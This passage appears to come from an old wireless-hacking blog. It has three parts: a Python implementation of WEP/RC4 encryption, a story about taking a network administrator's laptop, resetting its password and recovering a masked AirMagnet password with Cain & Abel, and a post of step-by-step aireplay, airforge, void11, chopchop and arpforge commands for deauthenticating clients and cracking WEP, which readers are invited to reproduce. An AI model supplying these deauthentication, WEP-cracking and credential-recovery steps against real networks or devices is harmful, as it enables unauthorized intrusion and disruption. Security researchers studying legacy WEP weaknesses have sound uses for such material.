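    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def parse_wep_key(text: str) -> bytes:
    """Accept both spellings used in the post: colon-separated (decrypt -p)
    and bare hex (kismet.conf wepkey=)."""
    key = bytes.fromhex(text.replace(":", ""))
    if len(key) not in (5, 13):
        raise ValueError("WEP keys are 40-bit (5 bytes) or 104-bit (13 bytes)")
    return key

def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes, key_id: int = 0) -> bytes:
    """Frame body = IV(3) | KeyID byte | RC4(IV || key) XOR (plaintext | ICV).
    The ICV is CRC-32 of the plaintext, little-endian, encrypted with the data."""
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    stream = rc4(iv + key, len(plaintext) + 4)
    return iv + bytes([key_id << 6]) + bytes(a ^ b for a, b in zip(plaintext + icv, stream))

def wep_decrypt(key: bytes, body: bytes):
    """Return the plaintext, or None when the ICV does not verify
    (wrong key, or a corrupted frame)."""
    if len(body) < 8:
        return None
    iv, cipher = body[:3], body[4:]
    plain = bytes(a ^ b for a, b in zip(cipher, rc4(iv + key, len(cipher))))
    data, icv = plain[:-4], plain[-4:]
    return data if zlib.crc32(data).to_bytes(4, "little") == icv else None

KEY = parse_wep_key("1E:A5:A5:6D:28:F5:20:B6:60:23:E2:42:11")   # key from the post
# Constructed frame: LLC/SNAP header for IP followed by a stand-in payload,
# encrypted under IV 00:00:01 with the key above.
SAMPLE_PLAINTEXT = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"constructed-ip-payload"
SAMPLE_BODY = wep_encrypt(KEY, b"\x00\x00\x01", SAMPLE_PLAINTEXT)

if __name__ == "__main__":
    print("right key:", wep_decrypt(KEY, SAMPLE_BODY))
    print("wrong key:", wep_decrypt(bytes(13), SAMPLE_BODY))
```

The same 24-bit IV sits in the clear in front of every frame, so the keystream depends on only 2^24 values per key; that, not RC4 itself, is why captures of enough traffic give up the key.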


Physical Intrusion

Now for the story! Physical security is of utmost importance and everybody can do it. Names and locations in the story have been changed to prevent public embarrassment and so on.

At work I was asked by my supervisor to test network security in a "new" without exploiting devices or misconfigurations. I decided on taking a physical approach to it for a change. It was lunch time and the vending machines were on the way, so I nabbed a quick snack. So off I head toward the IT offices and server room with a chocolate bar in hand and come up to the first obstacle, a door with a card swipe lock; it usually never works, and I turn the handle and the door opens! I'm now walking past the IT offices, but all the doors are locked; it seems everybody went out to lunch. It is good they are all out since no one is around, but the doors are locked. I head toward the IT help desk since it is not an office but more of a receptionist desk near the back of the building. I arrive and the help desk geek is out to lunch also, so I decide to look around. When employees have problems with their laptops the help desk geek submits a request for repair and stores the laptop in a cabinet until the PC techs can come by to pick them up. Well, I try the cabinet and lo and behold it's unlocked! About six laptops populate the cabinet, all high-end models. I spot a Sony VAIO with Cisco decals on it and remember that this is the Network Administrator's laptop. Apparently having Cisco decals on your laptop makes you an expert on all things networking. Anyways, I grab the laptop and go out to lunch with my supervisor with the laptop in hand. We go to lunch at a cafe next to our workplace to be within range of the corporate wireless network. We're both laughing at how we have the network administrator's laptop and he asks me to see what I can harvest out of it. I turn on the laptop and boot it up with my ERD Commander CD and quickly reset the administrator password. Once reset I log into Windows XP and start to snoop around.

On the desktop there is an icon named "AirMagnet Console". I inform my supervisor of this and he says to attempt to break into it since here at work it's a high-profile piece of software that is supposed to be well secured. I connect to the corporate network and start up AirMagnet and receive a connect dialog and a list of usernames to choose from. I select the network administrator's account, but as the login procedure starts I receive an error saying the software version is out of date; it then closes the application, opens a browser and requests a username and password to log into the web management console. In the connect dialog the username is visible in plaintext but the password is in ****** mode and I can't cut and paste the password into the web login. I remember a feature available in the Cain & Abel program that presents the ****** password in cleartext. I download Cain & Abel and run the decrypt utility and I now have the password. I attempt to reconnect to have the program open the browser, then promptly enter the username and password and I'm in. With the password and username I have complete control of the AirMagnet infrastructure. My supervisor just laughs, we finish up our lunch and head back to work. That same day he has a meeting with the heads of IT including the network administrator. I can only imagine how many heads will roll for this considering there is a "zero tolerance" policy regarding security.


That's all for today! Time to start collecting info for the next post.


~William



.: Sunday, April, 24 - Aireplay injection :.



.: Posted by William :.


The .: Sunday, May, 22 - 802.11b attacks on 802.11g :. post is a follow-up on cracking 802.11g networks with an 802.11b card.

Well, I've been doing some testing with the new aireplay and I managed to inject with all drivers. A couple of interesting things came up: I managed to deauthenticate an 802.11g client with an 802.11b card, and crack WEP on an all-802.11g network with an 802.11b card (having captured the traffic with an 802.11g card first).

For the deauthentication I used a Cisco Aironet CB21AG-A-K9 (Atheros card) to connect to a Netgear WGR614 access point and set both to 802.11g mode only. I used an SMC2532W-B 802.11b card (Prism 2.5 card) to deauthenticate the 802.11g stations. To ensure I was actually deauthenticating stations I used wavemon to monitor my Cisco card, which was associated to the AP.


Following settings were used:

Cisco Card

- iwpriv ath0 mode 3 (G mode only)


SMC Card

- Used wlanng drivers for aireplay
- hostap drivers for void11 with commands:
1) iwpriv wlan0 hostapd 1
2) iwconfig wlan0 mode master channel <channel>


Commands issued:

Created deauthentication packet using airforge:

airforge <BSSID> <SRC MAC> deauth


Then injected using the 802.11b card:

aireplay -m 26 -u 0 -v 12 -w 0 -x 1 -r deauth wlan0


Used void11 mass deauthentication with hostap drivers:

void11_penetration wlan0

Ignore the 'ioctl[PRISM2_IOCTL_HOSTAPD]: Invalid argument' error; void11 will still work.


My 802.11g station dropped like a brick.



I also managed to crack WEP on an all-802.11g network with my SMC2532W-B 802.11b card. I noticed something strange: when I sniff traffic with aireplay on my 802.11b card I sometimes manage to capture traffic from the 802.11g network. I am not sure if this is due to the encoding or what, but I have captured and replayed 802.11g traffic with my 802.11b card alone. I usually capture with my Netgear WG511 (PrismGT card) and then crack the packet with chopchop on my 802.11b SMC card.


Cracking an 802.11g network with an 802.11b card

Used the same equipment as mentioned in the beginning, plus a Netgear WG511 802.11g card.


Captured packet using aireplay:

aireplay -i eth1

(Also, sometimes I could use the 802.11b SMC card to capture traffic. Why? Not sure yet.)


Used chopchop to crack using the 802.11b card:

chopchop only works with Prism based cards
chopchop -i wlan0 -b <BSSID> -m <SRC MAC> -p <aireplay packet>


Utilized arpforge to create new packet:

arpforge <iv. file> 1 <bssid> <mac src> <ip src> <ip dst> fakearp


Inject new packet using 802.11b card: aireplay -r fakearp wlan0


The IV count would rise.


The number of packets sent by aireplay can be adjusted with the -x option. The default value is 256, but modifying this switch will yield better results. Results differ with the number of packets sent per second, so experiment with the packet send count value. Between 1500 and 2000 seems to be the sweet spot.

aireplay -r fakearp wlan0 -x 1500

- Thanks to radi0head and re@lity for this.


Please test my results to verify that they are consistent with your equipment. As for 802.11b capturing 802.11g traffic, it is strange. I set my Cisco Atheros card to G-mode only with iwpriv ath0 mode 3 and my Netgear AP is set to G-mode only also; please test this too. Post your results on the forum and use the date of this post as the title.


~William


